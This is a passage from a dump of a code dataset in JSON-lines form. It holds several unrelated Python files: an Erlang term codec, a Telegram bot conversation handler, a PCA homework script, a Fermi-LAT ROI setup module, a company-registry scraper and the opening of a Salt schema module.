offset):\n \"\"\"LARGE_BIG_EXT\"\"\"\n n = struct.unpack(\">L\", bytes[offset:offset+4])[0]\n offset += 4\n return self.decode_bigint(n, bytes, offset)\n\n def decode_bigint(self, n, bytes, offset):\n sign = ord(bytes[offset])\n offset += 1\n b = 1\n val = 0\n for i in range(n):\n val += ord(bytes[offset]) * b\n b <<= 8\n offset += 1\n if sign != 0:\n val = -val\n return val, offset\n\n def decode_e(self, bytes, offset):\n \"\"\"REFERENCE_EXT\"\"\"\n node, offset = self.decode_part(bytes, offset)\n if not isinstance(node, Atom):\n raise EncodingError(\"Expected atom while parsing REFERENCE_EXT, found %r instead\" % node)\n reference_id, creation = struct.unpack(\">LB\", bytes[offset:offset+5])\n return Reference(node, [reference_id], creation), offset+5\n\n def decode_r(self, bytes, offset):\n \"\"\"NEW_REFERENCE_EXT\"\"\"\n id_len = struct.unpack(\">H\", bytes[offset:offset+2])[0]\n node, offset = self.decode_part(bytes, offset+2)\n if not isinstance(node, Atom):\n raise EncodingError(\"Expected atom while parsing NEW_REFERENCE_EXT, found %r instead\" % node)\n creation = ord(bytes[offset])\n reference_id = struct.unpack(\">%dL\" % id_len, bytes[offset+1:offset+1+4*id_len])\n return Reference(node, reference_id, creation), offset+1+4*id_len\n\n def decode_f(self, bytes, offset):\n \"\"\"PORT_EXT\"\"\"\n node, offset = self.decode_part(bytes, offset)\n if not isinstance(node, Atom):\n raise EncodingError(\"Expected atom while parsing PORT_EXT, found %r instead\" % node)\n port_id, creation = struct.unpack(\">LB\", bytes[offset:offset+5])\n return Port(node, port_id, creation), offset+5\n\n def decode_g(self, bytes, offset):\n \"\"\"PID_EXT\"\"\"\n node, offset = self.decode_part(bytes, offset)\n if not isinstance(node, Atom):\n raise EncodingError(\"Expected atom while parsing PID_EXT, found %r instead\" % node)\n pid_id, serial, creation = struct.unpack(\">LLB\", bytes[offset:offset+9])\n return PID(node, pid_id, serial, creation), offset+9\n\n def decode_q(self, bytes, offset):\n \"\"\"EXPORT_EXT\"\"\"\n module, offset = self.decode_part(bytes, offset)\n if not isinstance(module, Atom):\n raise EncodingError(\"Expected atom while parsing EXPORT_EXT, found %r instead\" % module)\n function, offset = self.decode_part(bytes, offset)\n if not isinstance(function, Atom):\n raise EncodingError(\"Expected atom while parsing EXPORT_EXT, found %r instead\" % function)\n arity, offset = self.decode_part(bytes, offset)\n if not isinstance(arity, int):\n raise EncodingError(\"Expected integer while parsing EXPORT_EXT, found %r instead\" % arity)\n return Export(module, function, arity), offset+1\n\n def decode_P(self, bytes, offset):\n \"\"\"Compressed term\"\"\"\n usize = struct.unpack(\">L\", bytes[offset:offset+4])[0]\n bytes = zlib.decompress(bytes[offset+4:offset+4+usize])\n return self.decode_part(bytes, 0)\n\n def convert_atom(self, atom):\n if atom == \"true\":\n return True\n elif atom == \"false\":\n return False\n elif atom == \"none\":\n return None\n return Atom(atom)\n\nclass ErlangTermEncoder(object):\n def __init__(self, encoding=\"utf-8\", unicode_type=\"binary\"):\n self.encoding = encoding\n self.unicode_type = unicode_type\n\n def encode(self, obj, compressed=False):\n ubytes = \"\".join(self.encode_part(obj))\n if compressed is True:\n compressed = 6\n if not (compressed is False \\\n or (isinstance(compressed, (int, long)) \\\n and compressed >= 0 and compressed <= 9)):\n raise TypeError(\"compressed must be True, False or \"\n \"an integer between 0 and 9\")\n if compressed:\n cbytes = zlib.compress(ubytes, compressed)\n if len(cbytes) < len(ubytes):\n usize = struct.pack(\">L\", len(ubytes))\n ubytes = \"\".join([COMPRESSED, usize, cbytes])\n return chr(FORMAT_VERSION) + ubytes\n\n def encode_part(self, obj):\n if obj is False:\n return [ATOM_EXT, struct.pack(\">H\", 5), \"false\"]\n elif obj is True:\n return [ATOM_EXT, struct.pack(\">H\", 4), \"true\"]\n elif obj is None:\n return [ATOM_EXT, struct.pack(\">H\", 4), \"none\"]\n elif isinstance(obj, (int, long)):\n if 0 <= obj <= 255:\n return [SMALL_INTEGER_EXT, chr(obj)]\n elif -2147483648 <= obj <= 2147483647:\n return [INTEGER_EXT, struct.pack(\">l\", obj)]\n else:\n sign = chr(obj < 0)\n obj = abs(obj)\n\n big_bytes = []\n while obj > 0:\n big_bytes.append(chr(obj & 0xff))\n obj >>= 8\n\n if len(big_bytes) < 256:\n return [SMALL_BIG_EXT, chr(len(big_bytes)), sign] + big_bytes\n else:\n return [LARGE_BIG_EXT, struct.pack(\">L\", len(big_bytes)), sign] + big_bytes\n elif isinstance(obj, float):\n floatstr = \"%.20e\" % obj\n return [FLOAT_EXT, floatstr + \"\\x00\"*(31-len(floatstr))]\n elif isinstance(obj, Atom):\n return [ATOM_EXT, struct.pack(\">H\", len(obj)), obj]\n elif isinstance(obj, str):\n return [BINARY_EXT, struct.pack(\">L\", len(obj)), obj]\n elif isinstance(obj, unicode):\n return self.encode_unicode(obj)\n elif isinstance(obj, tuple):\n n = len(obj)\n if n < 256:\n bytes = [SMALL_TUPLE_EXT, chr(n)]\n else:\n bytes = [LARGE_TUPLE_EXT, struct.pack(\">L\", n)]\n for item in obj:\n bytes += self.encode_part(item)\n return bytes\n elif obj == []:\n return [NIL_EXT]\n elif isinstance(obj, list):\n bytes = [LIST_EXT, struct.pack(\">L\", len(obj))]\n for item in obj:\n bytes += self.encode_part(item)\n bytes.append(NIL_EXT) # list tail - no such thing in Python\n return bytes\n elif isinstance(obj, Reference):\n return [NEW_REFERENCE_EXT,\n struct.pack(\">H\", len(obj.ref_id)),\n ATOM_EXT, struct.pack(\">H\", len(obj.node)), obj.node,\n chr(obj.creation), struct.pack(\">%dL\" % len(obj.ref_id), *obj.ref_id)]\n elif isinstance(obj, Port):\n return [PORT_EXT,\n ATOM_EXT, struct.pack(\">H\", len(obj.node)), obj.node,\n struct.pack(\">LB\", obj.port_id, obj.creation)]\n elif isinstance(obj, PID):\n return [PID_EXT,\n ATOM_EXT, struct.pack(\">H\", len(obj.node)), obj.node,\n struct.pack(\">LLB\", obj.pid_id, obj.serial, obj.creation)]\n elif isinstance(obj, Export):\n return [EXPORT_EXT,\n ATOM_EXT, struct.pack(\">H\", len(obj.module)), obj.module,\n ATOM_EXT, struct.pack(\">H\", len(obj.function)), obj.function,\n SMALL_INTEGER_EXT, chr(obj.arity)]\n else:\n raise NotImplementedError(\"Unable to serialize %r\" % obj)\n\n def encode_unicode(self, obj):\n if not self.encoding:\n return self.encode_part([ord(x) for x in obj])\n else:\n st = obj.encode(self.encoding)\n if self.unicode_type == \"binary\":\n return [BINARY_EXT, struct.pack(\">L\", len(st)), st]\n elif self.unicode_type == \"str\":\n return [STRING_EXT, struct.pack(\">H\", len(st)), st]\n else:\n raise TypeError(\"Unknown unicode encoding type %s\" % self.unicode_type)\n","repo_name":"dizengrong/my_code","sub_path":"python-erlastic/erlastic/codec.py","file_name":"codec.py","file_ext":"py","file_size_in_byte":11982,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"22399887643","text":"n=eval(input(\"Enter the places till you want to add\"))\r\nx=[]\r\nfor i in range(n):\r\n x.append(input(\"Enter %d digit\"%i))\r\n print(x)\r\n \r\nprint(x[::-1])\r\nsum = []\r\ncarry = 0\r\ni=1\r\nfor i in range(n,0,-1):\r\n\tcarry+=int(x[-i])\r\n\tsum.append(str(carry%10))\r\n\tcarry //=10\r\n\r\nwhile carry>0:\r\n\tsum.append(str(carry%10))\r\n\tcarry=carry//10\r\nsum=sum[::-1]\r\nsum=\"\".join(sum)\r\nsum=int(sum)\r\nprint(sum)\r\n","repo_name":"sameerimamillapalli/VEDIC-ADDITION","sub_path":"add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15754764459","text":"\"\"\"\nProject Name: \tDCroSS\nAuthor List: \tPriya Pathak\nFilename: \t\tconversation_handler.py\nDescription: \tThe conversation_handler decides the flow of the conversation\n It uses ptb's ConversationHandler to define states, entry points, and a fallback.\n All the states and the methods associated with them return an integer to the\n conversation handler which then uses it to determine the next state to go to and then calls\n the functions associated with the next state.\n\"\"\"\n\n\nfrom telegram.ext import CommandHandler, MessageHandler, Filters, CallbackQueryHandler\nfrom state_handlers import *\n\n# Conversation states\n# These are imported from state_handlers, specifying here for convenience\n# CHOICE_LANGUAGE, CHOICE_START, ASK_PHONE, ASK_DISASTER, ASK_LOCATION, HANDLE_REPORT = range(6)\n\n# start_filters = Filters.text([\"Hi\", \"Hello\", \"Need help\"])\nchange_language_filters = Filters.regex(\"language\")\n\nconversation_handler = ConversationHandler(\n entry_points=[\n CommandHandler('start', ask_language),\n MessageHandler(change_language_filters, update_language),\n MessageHandler(Filters.text, ask_language),\n MessageHandler(Filters.photo, handle_images)\n ],\n states={\n CHOICE_LANGUAGE: [\n CallbackQueryHandler(start, pattern=\"^lang_(.*)$\")\n ],\n CHOICE_START: [\n CallbackQueryHandler(ask_phone, pattern=\"^report$\"),\n CallbackQueryHandler(cancel, pattern=\"^goto_webapp$\"),\n CallbackQueryHandler(cancel, pattern=\"^cancel$\")\n ],\n ASK_LOCATION: [\n MessageHandler(Filters.contact, ask_location)\n ],\n ASK_DISASTER: [\n MessageHandler(Filters.location, ask_disaster)\n ],\n HANDLE_REPORT: [\n CallbackQueryHandler(handle_earthquake_report, pattern=\"^earthquake$\"),\n CallbackQueryHandler(handle_water_logging_report, pattern=\"^water_logging$\"),\n CallbackQueryHandler(cancel, pattern=\"^cancel$\")\n ],\n DESCRIBE: [\n MessageHandler(Filters.text, catch_description),\n CallbackQueryHandler(skip_description, pattern=\"^no_description$\")\n ],\n UPDATE_LANG: [\n CallbackQueryHandler(catch_update_language, pattern=\"^lang_(.*)\")\n ],\n IMAGE: [\n CallbackQueryHandler(skip_image, pattern=\"^no_image$\"),\n MessageHandler(Filters.photo, handle_images)\n ]\n },\n fallbacks=[\n CommandHandler(\"cancel\", cancel)\n ]\n)\n","repo_name":"DCroSSLab/dcross-telegram-bot","sub_path":"conversation_handler.py","file_name":"conversation_handler.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19184291121","text":"\"\"\"\nINF 552 - Homework 3 - Minh Tran\nPCA\n\"\"\"\n\n'''\npython pcaMT.py pca-data.txt 2 pca-mt.txt\n'''\n\n# Imports\nfrom collections import namedtuple\nfrom numpy import genfromtxt, linalg, dot, sqrt\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D #<--- This is important for 3d plotting\n\n\"\"\"\nPCA algorithm:\nPerforms principal component on x, a matrix with observations in the rows.\n\"\"\"\n\n\"\"\"\nThe transpose trick says that if v is an eigenvector of M^T M, then M^T v is an eigenvector of MM^T.\nWe arbitrarily select \"100\" as the switching threshold. Another approach is to switch by comparing numPts and numDims.\n\"\"\"\n\nPC = namedtuple('PC', ['idx', 'eigVal', 'eigVec'])\ndef pca(x, targetDims):\n # Subtract the mean of dimension i from column i, in order to center the matrix.\n x = (x - x.mean(axis=0))\n\n # extract the number of data points and number of dimensions\n numPts, numDims = x.shape\n\n \"\"\"\n Returns the projection matrix (the eigenvectors of x^T x, ordered with largest eigenvectors first) and the eigenvalues (ordered from largest to smallest).\n \"\"\"\n if numDims >= 100:\n # get eigenvalues and eigenvectors of x*x.T, here eigenvalues are in ascending order\n eigenvalues, eigenvectors = linalg.eigh(dot(x, x.T))\n\n # print(\"eigenvalues: \", eigenvalues)\n\n # obtain the actual eigenvectors of x.T*x using transpose trick\n v = (dot(x.T, eigenvectors).T)[::-1] # Unscaled and reversing order, but the relative order is still correct.\n\n # obtain the eigenvalues in descending order:\n s = sqrt(eigenvalues)[::-1] # Unscaled, but the relative order is still correct.\n # print(\"s: \", s)\n else:\n u, s, v = linalg.svd(x, full_matrices=False)\n\n # print(\"s: \", s)\n # print(\"v: \", v)\n\n # extract the needed components:enumerate to maintain the count\n principalComps = sorted(enumerate(s), key=lambda x: x[1], reverse=True)[:targetDims]\n # print(\"principalComps: \", principalComps)\n\n return [PC(idx, eigVal, v[idx]) for (idx, eigVal) in principalComps]\n # return v, s\n\ndef PCAtransform(old, PCs):\n # extract matrix consisting of eigenvectors\n eigVecMat = np.asarray([pc.eigVec for pc in PCs])\n\n return eigVecMat.dot(old)\n\nif __name__ == '__main__':\n USAGE = 'USAGE: python pcaSKLearnMT.py pca-data.txt 2 pca-sklearn-mt.txt'\n if len(sys.argv) != 4:\n print(USAGE)\n sys.exit(1)\n else:\n inFile = sys.argv[1] # input file\n numDims = int(sys.argv[2]) # desired number of dimension after pca\n outFile = sys.argv[3] # output file\n\n # import data\n inputData = genfromtxt(inFile, delimiter='\\t')\n # print(\"inputData: \", np.size(inputData,1))\n\n # plot data\n if np.size(inputData, 1) == 3:\n fig = plt.figure()\n ax = plt.axes(projection='3d')\n ax.scatter3D(inputData[:, 0], inputData[:, 1], inputData[:, 2])\n plt.show(block=False)\n plt.pause(1)\n plt.savefig('3dData.png')\n plt.close()\n\n if np.size(inputData, 1) < numDims:\n raise ValueError('Cannot perform PCA because desired dimension is greater than original dimension')\n\n # principalComps = decomposeComponents(inputData, numDims)\n principalComps = pca(inputData, numDims)\n\n for count, eigVal, eigVec in principalComps:\n print('Principal Component Vector {0}: {1} with eigenvalue: {2}'.format(count, eigVec, eigVal))\n\n # np.set_printoptions(suppress=True)\n with open(outFile, 'w') as file:\n for old in inputData:\n transformedData = PCAtransform(old, principalComps)\n file.write('PCA: {0} -> {1}'.format(old, transformedData))\n file.write('\\n')","repo_name":"trademark152/Machine_Learning_For_Data_Science_INF552_USC","sub_path":"hw3_pca_fastmap/pcaMT.py","file_name":"pcaMT.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72843544891","text":"\nfor x in range(99, 1000):\n N = bin(x)[2::]\n for i in range(3):\n cal_1 = str(N).count(\"1\")\n cal_0 = str(N).count(\"0\")\n if cal_1 == cal_0:\n N = str(N) + str(N)[-1]\n elif cal_0 < cal_1:\n N = str(N) + \"0\"\n else:\n N = str(N) + \"1\"\n if int(N, 2) % 4 == 0:\n print(x)\n break","repo_name":"knage9/school_ege","sub_path":"school/ЕГЭ/ege/5.2.py","file_name":"5.2.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8739083125","text":"\"\"\"\nSet up an ROI factory object\n\n$Header: /nfs/slac/g/glast/ground/cvs/pointlike/python/uw/like2/Attic/roisetup.py,v 1.35 2013/10/13 13:55:58 burnett Exp $\n\n\"\"\"\nimport os, sys, types\nimport numpy as np\nimport pandas as pd\nimport skymaps\nfrom . import dataset, skymodel, diffuse , roi_bands\nfrom .. utilities import keyword_options, convolution\nfrom .. like import roi_extended, pypsf, pycaldb, pointspec2 #, roi_bands\nfrom .. data import dataman\n\n \nclass ExposureManager(object):\n \"\"\"A small class to handle the trivial combination of effective area and livetime.\n \n Also handles an ad-hoc exposure correction\n \"\"\"\n\n def __init__(self, dataset, **datadict): \n \"\"\"\n Parameters\n ----------\n dataset : DataSet object\n for CALDB, aeff, some parameters\n \n datadict['exposure-correction'] : list of strings defining functions of energy\n the correction factors to apply to front, back \n \"\"\"\n\n def make_exposure():\n if dataset.exposure_cube is not None:\n ## use pregenerated gtexpcube2 cube; turn off interpolation\n return [skymaps.DiffuseFunction(f,1000.,False) for f in dataset.exposure_cube]\n \n skymaps.EffectiveArea.set_CALDB(dataset.CALDBManager.CALDB)\n skymaps.Exposure.set_cutoff(np.cos(np.radians(dataset.thetacut)))\n inst = ['front', 'back']\n aeff_files = dataset.CALDBManager.get_aeff()\n ok = [os.path.exists(file) for file in aeff_files]\n if not all(ok):\n raise DataSetError('one of CALDB aeff files not found: %s' %aeff_files)\n self.ea = [skymaps.EffectiveArea('', file) for file in aeff_files]\n if dataset.verbose: print (' -->effective areas at 1 GeV: ', \\\n ['%s: %6.1f'% (inst[i],self.ea[i](1000)) for i in range(len(inst))])\n \n if dataset.use_weighted_livetime and hasattr(dataset, 'weighted_lt'):\n return [skymaps.Exposure(dataset.lt,dataset.weighted_lt,ea) for ea in self.ea]\n else:\n return [skymaps.Exposure(dataset.lt,ea) for ea in self.ea]\n \n self.exposure = make_exposure()\n\n correction = datadict.pop('exposure_correction', None)\n if correction is not None:\n self.correction = map(eval, correction)\n energies = [100, 1000, 10000]\n if not self.quiet: 'Exposure correction: for energies %s ' % energies\n for i,f in enumerate(self.correction):\n if not self.quiet: ('\\tfront:','\\tback: ','\\tdfront:', '\\tdback')[i], map( f , energies)\n else:\n self.correction = lambda x: 1.0, lambda x: 1.0\n iem_correction = datadict.pop('iem_correction', None)\n if iem_correction is not None:\n self.correction.append( eval(iem_correction))\n self.correction.append( eval(iem_correction))\n energies = [133, 237, 421, 749, 1.333]\n if not self.quiet: 'Diffuse correction: for energies %s ' % energies\n for i,f in enumerate(self.correction[3:]):\n if not self.quiet: ('\\tfront: ','\\tback: ',)[i], map( f , energies)\n self.systematic = datadict.pop('systematic', None)\n if self.systematic is not None:\n if not self.quiet: 'Galactic diffuse systematic uncertainty: %f' % self.systematic\n \n def value(self, sdir, energy, event_class):\n return self.exposure[event_class].value(sdir, energy)*self.correction[event_class](energy)\n \nclass ExposureCorrection(object):\n \"\"\" logarithmic interpolation function\n \"\"\"\n def __init__(self, a,b, ea=100, eb=300):\n self.c = (b-a)/np.log(eb/ea)\n self.d = a -self.c*np.log(ea)\n self.a, self.b = a,b\n self.ea,self.eb = ea,eb\n def __call__(self, e):\n if e>self.eb: return self.b\n if e=len(self.vals): return 1.0\n# return self.vals[int(loc)]\n\n\nclass ROIfactory(object):\n \"\"\"\n combine the dataset and skymodel for an ROI\n \n \"\"\"\n defaults =(\n ('analysis_kw', dict(irf=None,minROI=5,maxROI=5, emin=100, emax=316277, quiet=False),'roi analysis keywords'),\n ('skymodel_kw', {}, 'skymodel keywords'),\n ('convolve_kw', dict( resolution=0.125, # applied to OTF convolution: if zero, skip convolution\n pixelsize=0.05, # ExtendedSourceConvolution\n num_points=25), # AnalyticConvolution\n 'convolution parameters'),\n ('irf', None, 'Set to override saved value with the skymodel: expect to find in custom_irf_dir'),\n ('extended', None, 'Set to override saved value with skymodel'),\n #('selector', skymodel.HEALPixSourceSelector,' factory of SourceSelector objects'),\n ('data_interval', 0, 'Data interval (e.g., month) to use'),\n ('nocreate', True, 'Do not allow creation of a binned photon file'),\n #('galactic_correction', None, 'Name of file with diffuse correction factors'), \n #('galactic_systematic', None, 'Systematic uncertainty for the galactic counts'), \n ('quiet', False, 'set to suppress most output'),\n )\n\n @keyword_options.decorate(defaults)\n def __init__(self, modeldir, dataspec=None, **kwargs):\n \"\"\" \n parameters\n ----------\n modeldir: folder containing skymodel definition\n dataspec : string or dict or None\n used to look up data specification\n if string, equivalent to dict(dataname=dataspec); otherwise the dict must have\n a dataname element\n if None, use the data used to generate the skymodel\n \"\"\"\n keyword_options.process(self, kwargs)\n self.analysis_kw['quiet']=self.quiet\n if not self.quiet: 'ROIfactory setup: \\n\\tskymodel: ', modeldir\n # extract parameters used by skymodel for defaults\n input_config = eval(open(os.path.expandvars(modeldir+'/config.txt')).read())\n for key in 'extended irf'.split():\n if self.__dict__[key] is None or self.__dict__[key]=='None': \n #print ('%s: %s replace from skymodel: \"%s\"' %(key, kwargs.get(key,None), input_config.get(key,None)))\n self.__dict__[key]=input_config.get(key, None)\n\n # check for skymodel_kw in the config,txt file, use if found\n config_skymodel = input_config.get('skymodel_config', None)\n if config_skymodel is not None:\n self.skymodel_kw.update(config_skymodel)\n if not self.quiet: 'Using skymodel config: %s' % self.skymodel_kw\n \n self.skymodel = skymodel.SkyModel(modeldir, **self.skymodel_kw)\n\n if isinstance(dataspec,dataman.DataSet):\n self.dataset = dataspec\n self.dataset.CALDBManager = pycaldb.CALDBManager(irf = self.analysis_kw.get('irf',None),\n psf_irf = self.analysis_kw.get('psf_irf',None),\n CALDB = self.analysis_kw.get('CALDB',None),\n custom_irf_dir=self.analysis_kw.get(\"irfdir\",None))\n self.data_manager = self.dataset(self.data_interval) #need to save a reference to avoid a segfault\n self.exposure = pointspec2.ExposureManager(self.data_manager,self.dataset.CALDBManager)\n\n self.exposure.correction = [lambda e: 1,lambda e : 1] #TODO\n \n else: # not a DataSet or dict\n if dataspec is None:\n if not self.quiet: 'dataspec is None: loading datadict from skymodel.config'; sys.stdout.flush()\n datadict = self.skymodel.config['datadict']\n if type(datadict)==types.StringType: datadict=eval(datadict)\n if isinstance(datadict, dataman.DataSet): \n interval = self.skymodel.config.get('interval', None)\n if interval is None: interval = self.skymodel.config.get('data_interval', None)\n assert interval is not None, 'did not find interval or data_interval in skymodel.config'\n dset = datadict[interval]\n assert hasattr(dset, 'binfile'), 'Not a DataSet? %s' % dataset\n datadict = dict(dataname=dset)\n else:\n assert type(datadict)==types.DictType, 'expected a dict'\n elif isinstance(dataspec, dict):\n # a dictionary\n datadict = dataspec\n else:\n if not self.quiet: 'looking up dataspec %s' % dataspec\n datadict = dict(dataname=dataspec)\\\n if type(dataspec)!=types.DictType else dataspec\n if not self.quiet: '\\tdatadict: ', datadict\n if True: #self.analysis_kw.get('irf',None) is None:\n t = self.__dict__['irf']\n if t[0] in ('\"',\"'\"): t = eval(t)\n self.analysis_kw['irf'] = t\n if not self.quiet: '\\tirf:\\t%s' % self.analysis_kw['irf'] ; sys.stdout.flush()\n #datadict = dict(dataname=dataspec, ) \\\n # if type(dataspec)!=types.DictType else dataspec\n exposure_correction=datadict.pop('exposure_correction', None) \n self.dataset = dataset.DataSet(datadict['dataname'], interval=datadict.get('interval',None),\n nocreate = self.nocreate,\n **self.analysis_kw)\n if not self.quiet: self.dataset\n self.exposure = ExposureManager(self.dataset, exposure_correction=exposure_correction)\n \n if 'CUSTOM_IRF_DIR' not in os.environ and os.path.exists(os.path.expandvars('$FERMI/custom_irfs')):\n os.environ['CUSTOM_IRF_DIR'] = os.path.expandvars('$FERMI/custom_irfs')\n self.psf = pypsf.CALDBPsf(self.dataset.CALDBManager)\n \n convolution.AnalyticConvolution.set_points(self.convolve_kw['num_points'])\n convolution.ExtendedSourceConvolution.set_pixelsize(self.convolve_kw['pixelsize'])\n\n def __str__(self):\n s = '%s configuration:\\n'% self.__class__.__name__\n show = \"\"\"analysis_kw selector\"\"\".split()\n for key in show:\n s += '\\t%-20s: %s\\n' %(key,\n self.__dict__[key] if key in self.__dict__.keys() else 'not in self.__dict__!')\n return s\n\n def _diffuse_sources(self, src_sel):\n \"\"\" return the diffuse, global and extended sources\n \"\"\"\n skydir = src_sel.skydir()\n assert skydir is not None, 'should use the ROI skydir'\n # get all diffuse models appropriate for this ROI\n globals, extended = self.skymodel.get_diffuse_sources(src_sel)\n\n try:\n if hasattr(self,'data_manager'):\n bpd = self.data_manager.dataspec.binsperdec\n else:\n bpd = self.dataset.binsperdec\n global_models = [diffuse.mapper(self.psf, self.exposure, skydir, \n source, binsperdec = bpd, quiet=self.quiet) for source in globals]\n except Exception as msg:\n print (self.dataset, msg)\n raise\n\n def extended_mapper( source):\n if not self.quiet:\n if not self.quiet: 'constructing extended model for \"%s\", spatial model: %s' \\\n %(source, source.spatial_model.__class__.__name__)\n return roi_extended.ROIExtendedModel.factory(self,source,skydir)\n extended_models = map(extended_mapper, extended)\n return global_models, extended_models\n\n def _local_sources(self, src_sel):\n \"\"\" return the local sources with significant overlap with the ROI\n \"\"\"\n ps = self.skymodel.get_point_sources(src_sel)\n return np.asarray(ps)\n\n def roi(self, *pars, **kwargs):\n \"\"\" return an object based on the selector, with attributes for creating roi analysis:\n list of ROIBand objects\n list of models: point sources and diffuse\n pars, kwargs : pass to the selector\n \"\"\"\n roi_kw = kwargs.pop('roi_kw',dict())\n # allow parameter to be a name or a direction\n sel = pars[0]\n source_name=None\n if type(sel)==types.IntType:\n index = int(sel) # needs to be int if int type\n elif type(sel)==skymaps.SkyDir:\n index = self.skymodel.hpindex(sel)\n elif type(sel)==types.StringType:\n index = self.skymodel.hpindex(self.skymodel.find_source(sel).skydir)\n source_name=sel\n elif type(sel)==tuple and len(sel)==2: # interpret a tuple of length 2 as (ra,dec)\n index = self.skymodel.hpindex(skymaps.SkyDir(*sel))\n else:\n raise Exception( 'factory argument \"%s\" not recognized.' %sel)\n ## preselect the given source after setting up the ROI\n ## (not implemented here)\n #\n src_sel = self.selector(index, **kwargs)\n\n class ROIdef(object):\n def __init__(self, **kwargs):\n self.__dict__.update(kwargs)\n def __str__(self):\n return 'ROIdef for %s' %self.name\n skydir = src_sel.skydir() \n global_sources, extended_sources = self._diffuse_sources(src_sel)\n if isinstance(self.dataset,dataman.DataSet):\n bandsel = BandSelector(self.data_manager,\n self.psf,\n self.exposure,\n skydir)\n bands = bandsel(minROI = self.analysis_kw['minROI'],\n maxROI = self.analysis_kw['maxROI'],\n emin = self.analysis_kw['emin'],\n emax = self.analysis_kw['emax'])\n else:\n bands = self.dataset(self.psf,self.exposure,skydir)\n \n ## setup galactic diffuse correction and/or counts to pass into ROI generation\n #if self.galactic_correction is not None:\n # # look up the diffuse correction factors for this ROI, by name\n # self.exposure.dcorr = self.dcorr.ix[src_sel.name()].values\n\n return ROIdef( name=src_sel.name() ,\n roi_dir=skydir, \n bands=bands,\n global_sources=global_sources,\n extended_sources = extended_sources,\n point_sources=self._local_sources(src_sel), \n exposure=self.exposure,\n **roi_kw)\n \n def __call__(self, *pars, **kwargs):\n \"\"\" alias for roi() \"\"\"\n return self.roi(*pars, **kwargs)\n \n def reload_model(self):\n \"\"\" Reload the sources in the model \"\"\"\n self.skymodel._load_sources()\n\nclass BandSelector(object):\n \"\"\"Class to handle selection of bands with new data management code.\n \n Should be moved somewhere more sensible.\"\"\"\n\n def __init__(self,data_manager,psf,exposure,roi_dir):\n class SA(object):\n def __init__(self,**kw):self.__dict__.update(kw)\n #make sure exposure is the right kind of ExposureManager and that\n #data_manager is the same one use for the exposure\n assert(hasattr(exposure,'data_manager'))\n data_manager.dataspec.check_consistency(exposure.data_manager.dataspec)\n self.sa = SA(psf=psf,exposure=exposure)\n self.data_manager = data_manager\n self.roi_dir = roi_dir\n \n def __call__(self,minROI=7,maxROI=7,emin=100,emax=1e6,band_kw=dict()):\n self.sa.minROI = minROI\n self.sa.maxROI = maxROI\n bands = []\n for i,band in enumerate(self.data_manager.bpd):\n if (band.emin() + 1) >= emin and (band.emax() - 1) < emax:\n bands.append(roi_bands.ROIBand(band, self.sa, self.roi_dir,**band_kw))\n return np.asarray(bands)\n\n \n\ndef main(modeldir='3years/uw10', skymodel_kw={}):\n rf = ROIfactory(modeldir, **skymodel_kw)\n return rf\n","repo_name":"fermi-lat/pointlike","sub_path":"python/uw/like2/roisetup.py","file_name":"roisetup.py","file_ext":"py","file_size_in_byte":16892,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"5335520139","text":"import requests\nfrom bs4 import BeautifulSoup\n\nfrom contract.services.director_name import short_director_name\n\n\ndef get_fop_info(code: str) -> dict:\n url = f\"https://clarity-project.info/edr/{code}\"\n response = requests.get(url)\n if response.status_code == 200:\n soup = BeautifulSoup(response.content, \"lxml\")\n main_div = soup.find(\"div\", class_=\"entity-content\").find_all(\"td\")\n raw_short_name = \" \".join(main_div[3].text.replace('\"', \"«\").split())\n short_name = raw_short_name[:-1] + \"»\"\n full_name = short_name.replace(\"ФОП\", \"ФІЗИЧНА ОСОБА-ПІДПРИЄМЕЦЬ\")\n code_company = main_div[1].text.lstrip()\n address = \" \".join(\n main_div[7].find(\"div\").text.replace(\"Запис в ЄДР:\", \"\").split()[1:]\n )\n director = main_div[11].find(\"div\").find(\"a\").text.lstrip()\n final_data = dict(\n {\n \"short_name\": short_name,\n \"code_company\": code_company,\n \"director\": director,\n \"short_dir_name\": short_director_name(director),\n \"full_name\": full_name,\n \"address\": address,\n }\n )\n return final_data\n else:\n return {}\n","repo_name":"ruslan-kornich/contract_creator","sub_path":"contract/services/get_fop_details.py","file_name":"get_fop_details.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12850097074","text":"\"\"\"\n :codeauthor: Pedro Algarvio (pedro@algarvio.me)\n :codeauthor: Alexandru Bleotu (alexandru.bleotu@morganstanley.com)\n\n\n salt.utils.schema\n ~~~~~~~~~~~~~~~~~\n\n Object Oriented Configuration - JSON Schema compatible generator\n\n This code was inspired by `jsl`__, \"A Python DSL for describing JSON\n schemas\".\n\n .. __: https://jsl.readthedocs.io/\n\n\n A configuration document or configuration document section is defined using\n the py:class:`Schema`, the configuration items are defined by any of the\n subclasses of py:class:`BaseSchemaItem` as attributes of a subclass of\n py:class:`Schema` class.\n\n A more complex configuration document (containing a defininitions section)\n is defined using the py:class:`DefinitionsSchema`. This type of\n schema supports having complex configuration items as attributes (defined\n extending the py:class:`ComplexSchemaItem`). These items have other\n configuration items (complex or not) as attributes, allowing to verify\n more complex JSON data structures\n\n As an example:\n\n .. code-block:: python\n\n class HostConfig(Schema):\n title = 'Host Configuration'\n description = 'This is the host configuration'\n\n host = StringItem(\n 'Host',\n 'The looong host description',\n default=None,\n minimum=1\n )\n\n port = NumberItem(\n description='The port number',\n default=80,\n required=False,\n minimum=0,\n inclusiveMinimum=False,\n maximum=65535\n )\n\n The serialized version of the above configuration definition is:\n\n .. code-block:: python\n\n >>> print(HostConfig.serialize())\n OrderedDict([\n ('$schema', 'http://json-schema.org/draft-04/schema#'),\n 